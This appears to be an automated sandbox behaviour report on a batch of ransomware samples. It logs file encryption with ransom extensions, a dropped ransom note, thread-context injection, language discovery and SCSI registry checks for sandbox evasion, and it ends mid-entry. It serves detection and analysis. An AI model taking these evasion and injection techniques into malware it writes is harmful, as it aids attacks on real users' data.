UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\oleaut32.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\ole32.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\bcryptPrimitives.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe File opened for modification C:\Windows\SysWOW64\shfolder.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 2008 cmd.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3112 set thread context of 5688 3112 HEUR-Trojan-Ransom.MSIL.Blocker.gen-186d9afa5f922ed9b4cb93853bd15496aeaf37d212f479c049fbd74c40d0b8af.exe 198 PID 1164 set thread context of 5556 1164 Trojan-Ransom.Win32.Locky.bim-fb0f5ff4760f6869a63fc6ed01d19241d83919b88f70343473cb6af014fa8954.exe 220 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\images\FileText32x32.png lsass.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Advanced-Dark.scale-300.png lsass.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\OutlookMailBadge.scale-200.png lsass.exe File opened for modification C:\Program Files\7-Zip\Lang\sa.txt.Email=[[email protected]]ID=[XROALVHDRQERFNPM].encrypt.C6C-677-A9C lsass.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_Retail-ul-oob.xrm-ms.C6C-677-A9C lsass.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD_K_COL.HXK lsass.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BOLDSTRI\THMBNAIL.PNG.C6C-677-A9C lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-80_altform-unplated_contrast-black.png lsass.exe File opened for modification C:\Program Files\7-Zip\Lang\da.txt.Email=[[email protected]]ID=[XROALVHDRQERFNPM].encrypt lsass.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Retail-ul-phn.xrm-ms.C6C-677-A9C lsass.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN097.XML.C6C-677-A9C lsass.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TEXTCONV\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT lsass.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\as80.xsl.C6C-677-A9C lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionSmallTile.scale-150.png lsass.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\CardUIBkg.scale-125.HCBlack.png lsass.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Generic-Dark.scale-300.png lsass.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\MicrosoftAccount.scale-180.png lsass.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\EmptySearch.scale-150.png lsass.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019VL_MAK_AE-ppd.xrm-ms.C6C-677-A9C lsass.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\WATERMAR\THMBNAIL.PNG lsass.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\jamendo.luac.C6C-677-A9C lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Fonts\CamMDL2.2.07.ttf lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Images\SkypeWideTile.scale-200.png lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-100_8wekyb3d8bbwe\resources.pri lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxIdentityProvider_12.50.6001.0_x64__8wekyb3d8bbwe\XboxIdp.Tasks.winmd lsass.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Grace-ul-oob.xrm-ms lsass.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\REFINED\THMBNAIL.PNG lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\Assets\tinytile.targetsize-48_contrast-black.png lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Square44x44Logo.targetsize-48.png lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\RTL\contrast-black\SmallTile.scale-200.png lsass.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\AppPackageStoreLogo.scale-100_contrast-white.png lsass.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordR_Trial-ppd.xrm-ms lsass.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Images\SkypeLargeTile.scale-200.png lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\node_modules\reactxp-experimental-navigation\NavigationExperimental\assets\[email protected] lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.5f513be2.pri lsass.exe File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.C6C-677-A9C lsass.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription1-ppd.xrm-ms lsass.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PIXEL\PREVIEW.GIF lsass.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\management\jmxremote.access.C6C-677-A9C lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\Weather_LogoSmall.targetsize-16.png lsass.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\en-gb\locimages\offsymk.ttf lsass.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\Dismiss.scale-80.png lsass.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\icu.md lsass.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_Grace-ppd.xrm-ms.C6C-677-A9C lsass.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tt\LC_MESSAGES\vlc.mo.C6C-677-A9C lsass.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\mesa3d.md.C6C-677-A9C lsass.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\vlc.mo lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\MixedRealityPortalAppList.targetsize-30_altform-lightunplated.png lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Star.png lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Store\LargeTile.scale-125.png lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionLargeTile.scale-100.png lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-30.png lsass.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Violet.xml lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Eyebrow.png lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-30_altform-lightunplated.png lsass.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\libxslt.md.C6C-677-A9C lsass.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Trial2-pl.xrm-ms.C6C-677-A9C lsass.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription4-pl.xrm-ms lsass.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_OEM_Perp-ul-oob.xrm-ms lsass.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_OEM_Perp-ppd.xrm-ms lsass.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailBadge.scale-125.png lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_NinjaCat.png lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-48_altform-unplated.png lsass.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_a8625c1886757984\comctl32.dll UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid pid_target Process procid_target 2036 2940 WerFault.exe 111 3832 2096 WerFault.exe 118 2076 2352 WerFault.exe 119 1196 5964 WerFault.exe 242 -
System Location Discovery: System Language Discovery 1 TTPs 38 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Encoder.gen-ce979ac72ae1a0e4c13109625c4eee0ad521ee72cf380642bcc8375739b82d29.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Gimemo.cdqu-e633ebfa45af4939e7cdef26411dbc929554ce84c076cbd85ab4a19ec1f3abcd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language y_installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.jzec-ed34ead6ec6c362e85707d8a4ce385f6a967e155242be57ee4ee7235759d9870.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.mvwo-8f4df1b11998017853ed5d0f009f461275cdd73f9c274d865fd11c36f6280118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Locky.bim-fb0f5ff4760f6869a63fc6ed01d19241d83919b88f70343473cb6af014fa8954.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Chromium Updater Module.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SayCheese.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Vega.ap-b7f96fbb9844cac5c7f4ec966683f3564bbb9a2f453927e1c579dcb0154f5f83.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language y_installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Agent.gen-a6787985243f50e272c98fe15b21f461f892e8905bbc5ffd7018ca2694bc5079.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language notepad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Encoder.lqn-5fd1a714a3c72c00cc9cbcdf8f100c2e8e8e475354c8c582d1711e737c398423.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lsass.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Gimemo.cdqu-e633ebfa45af4939e7cdef26411dbc929554ce84c076cbd85ab4a19ec1f3abcd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.MSIL.Blocker.aw-f4ca0ba460f6423e6168c27d45dc590bbd79774be4aee3804e0b5ec961ab97fa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Blocker.gen-2cf41c6c7b120dca73fc1b0145406c190c5ea38edf5f349387a51184359e82e6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Locky.bim-fb0f5ff4760f6869a63fc6ed01d19241d83919b88f70343473cb6af014fa8954.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fast.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Makop.gen-9ddffccd20b4260116e889b979e21e772848a457cb6b17a2664a4ee12aa9199f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Gimemo.besk-bcc15645592a6add5c91d3d097e63e8775b949be72de33fd7b06c5197c9a40fe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VHO-Trojan-Ransom.Win32.Encoder.gen-f246d574704530d9e191350c1d4ecf118e4cb5444e598c16351fd02acc3fe928.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
NSIS installer 2 IoCs
resource yara_rule behavioral1/files/0x0007000000023cb0-102.dat nsis_installer_1 behavioral1/files/0x0007000000023cb0-102.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName Trojan-Ransom.Win32.Locky.bim-fb0f5ff4760f6869a63fc6ed01d19241d83919b88f70343473cb6af014fa8954.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened 